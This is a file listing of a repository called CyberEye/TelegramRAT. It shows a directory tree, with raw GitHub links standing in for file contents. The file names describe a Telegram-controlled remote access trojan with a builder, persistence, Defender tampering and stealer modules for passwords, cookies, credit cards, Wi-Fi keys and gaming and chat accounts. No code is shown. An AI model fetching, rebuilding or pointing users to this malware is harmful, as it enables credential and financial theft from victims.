├── .gitignore ├── CyberEye.Client.Builder ├── App.config ├── CyberEye.Client.Builder.csproj ├── FrmAbout.Designer.cs ├── FrmAbout.cs ├── FrmAbout.resx ├── FrmAssemblyChanger.Designer.cs ├── FrmAssemblyChanger.cs ├── FrmAssemblyChanger.resx ├── FrmBuild.Designer.cs ├── FrmBuild.cs ├── FrmBuild.resx ├── Program.cs ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings └── Resources │ └── cybereye.jpg ├── LICENSE ├── README.md ├── TelegramRAT.sln ├── TelegramRAT ├── Program.cs ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ └── Resources.resx ├── TelegramRAT.csproj ├── app.config ├── config.cs ├── core │ ├── SimpleJSON.cs │ ├── commands.cs │ ├── core.cs │ ├── libs │ │ ├── 7zr.exe │ │ ├── AudioSwitcher.AudioApi.CoreAudio.dll │ │ ├── AudioSwitcher.AudioApi.dll │ │ ├── BugReport.exe │ │ ├── Sodium.dll │ │ ├── libsodium-64.dll │ │ └── libsodium.dll │ ├── persistence.cs │ ├── stealer │ │ ├── AutoStealer.cs │ │ ├── Bookmarks.cs │ │ ├── Cookies.cs │ │ ├── CreditCards.cs │ │ ├── Crypt.cs │ │ ├── DPAPI.cs │ │ ├── Discord.cs │ │ ├── FileZilla.cs │ │ ├── GrabDesktop.cs │ │ ├── History.cs │ │ ├── Passwords.cs │ │ ├── SQLite.cs │ │ ├── Steam.cs │ │ ├── Telegram.cs │ │ └── clipper.cs │ ├── telegram.cs │ └── utils.cs └── modded │ ├── Fun │ ├── Beep.cs │ ├── CustomMsgBox.cs │ ├── Cycle.cs │ └── SetRandomCurPos.cs │ ├── Sys │ ├── Compiler.cs │ ├── HideOrUnhideDir.cs │ ├── Regedit.cs │ ├── Wifi_Steal.cs │ └── WinDefend.cs │ └── stealer │ └── Minecraft.cs ├── images ├── Builder.jpg ├── BuilderBuild.jpg ├── BuilderLinux.png ├── DownloadAndUnzipBuilder.jpg ├── ExecuteBuilder.jpg ├── build.JPG ├── chatidBot.JPG ├── createBot.JPG ├── loadSourceCode.JPG ├── logo.jpg ├── openConfig.JPG ├── openMalware.JPG ├── saveConfig.JPG └── vs.JPG ├── logo.jpg ├── moddedLog.txt └── version.txt /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/.gitignore -------------------------------------------------------------------------------- /CyberEye.Client.Builder/App.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/App.config -------------------------------------------------------------------------------- /CyberEye.Client.Builder/CyberEye.Client.Builder.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/CyberEye.Client.Builder.csproj -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAbout.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmAbout.Designer.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAbout.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmAbout.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAbout.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmAbout.resx -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAssemblyChanger.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmAssemblyChanger.Designer.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAssemblyChanger.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmAssemblyChanger.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAssemblyChanger.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmAssemblyChanger.resx -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmBuild.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmBuild.Designer.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmBuild.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmBuild.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmBuild.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/FrmBuild.resx -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Program.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Program.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Properties/Resources.Designer.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Resources.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Properties/Resources.resx -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Properties/Settings.Designer.cs -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Settings.settings: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Properties/Settings.settings -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Resources/cybereye.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/CyberEye.Client.Builder/Resources/cybereye.jpg -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/README.md -------------------------------------------------------------------------------- /TelegramRAT.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT.sln -------------------------------------------------------------------------------- /TelegramRAT/Program.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/Program.cs -------------------------------------------------------------------------------- /TelegramRAT/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /TelegramRAT/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/Properties/Resources.Designer.cs -------------------------------------------------------------------------------- /TelegramRAT/Properties/Resources.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/Properties/Resources.resx -------------------------------------------------------------------------------- /TelegramRAT/TelegramRAT.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/TelegramRAT.csproj -------------------------------------------------------------------------------- /TelegramRAT/app.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/app.config -------------------------------------------------------------------------------- /TelegramRAT/config.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/config.cs -------------------------------------------------------------------------------- /TelegramRAT/core/SimpleJSON.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/SimpleJSON.cs -------------------------------------------------------------------------------- /TelegramRAT/core/commands.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/commands.cs -------------------------------------------------------------------------------- /TelegramRAT/core/core.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/core.cs -------------------------------------------------------------------------------- /TelegramRAT/core/libs/7zr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/7zr.exe -------------------------------------------------------------------------------- /TelegramRAT/core/libs/AudioSwitcher.AudioApi.CoreAudio.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/AudioSwitcher.AudioApi.CoreAudio.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/AudioSwitcher.AudioApi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/AudioSwitcher.AudioApi.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/BugReport.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/BugReport.exe -------------------------------------------------------------------------------- /TelegramRAT/core/libs/Sodium.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/Sodium.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/libsodium-64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/libsodium-64.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/libsodium.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/libs/libsodium.dll -------------------------------------------------------------------------------- /TelegramRAT/core/persistence.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/persistence.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/AutoStealer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/AutoStealer.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Bookmarks.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Bookmarks.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Cookies.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Cookies.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/CreditCards.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/CreditCards.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Crypt.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Crypt.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/DPAPI.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/DPAPI.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Discord.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Discord.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/FileZilla.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/FileZilla.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/GrabDesktop.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/GrabDesktop.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/History.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/History.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Passwords.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Passwords.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/SQLite.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/SQLite.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Steam.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Steam.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Telegram.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/Telegram.cs -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/clipper.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/stealer/clipper.cs -------------------------------------------------------------------------------- /TelegramRAT/core/telegram.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/telegram.cs -------------------------------------------------------------------------------- /TelegramRAT/core/utils.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/core/utils.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/Beep.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Fun/Beep.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/CustomMsgBox.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Fun/CustomMsgBox.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/Cycle.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Fun/Cycle.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/SetRandomCurPos.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Fun/SetRandomCurPos.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/Compiler.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Sys/Compiler.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/HideOrUnhideDir.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Sys/HideOrUnhideDir.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/Regedit.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Sys/Regedit.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/Wifi_Steal.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Sys/Wifi_Steal.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/WinDefend.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/Sys/WinDefend.cs -------------------------------------------------------------------------------- /TelegramRAT/modded/stealer/Minecraft.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/TelegramRAT/modded/stealer/Minecraft.cs -------------------------------------------------------------------------------- /images/Builder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/Builder.jpg -------------------------------------------------------------------------------- /images/BuilderBuild.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/BuilderBuild.jpg -------------------------------------------------------------------------------- /images/BuilderLinux.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/BuilderLinux.png -------------------------------------------------------------------------------- /images/DownloadAndUnzipBuilder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/DownloadAndUnzipBuilder.jpg -------------------------------------------------------------------------------- /images/ExecuteBuilder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/ExecuteBuilder.jpg -------------------------------------------------------------------------------- /images/build.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/build.JPG -------------------------------------------------------------------------------- /images/chatidBot.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/chatidBot.JPG -------------------------------------------------------------------------------- /images/createBot.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/createBot.JPG -------------------------------------------------------------------------------- /images/loadSourceCode.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/loadSourceCode.JPG -------------------------------------------------------------------------------- /images/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/logo.jpg -------------------------------------------------------------------------------- /images/openConfig.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/openConfig.JPG -------------------------------------------------------------------------------- /images/openMalware.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/openMalware.JPG -------------------------------------------------------------------------------- /images/saveConfig.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/saveConfig.JPG -------------------------------------------------------------------------------- /images/vs.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/images/vs.JPG -------------------------------------------------------------------------------- /logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/logo.jpg -------------------------------------------------------------------------------- /moddedLog.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/HEAD/moddedLog.txt -------------------------------------------------------------------------------- /version.txt: -------------------------------------------------------------------------------- 1 | 1.0.2 --------------------------------------------------------------------------------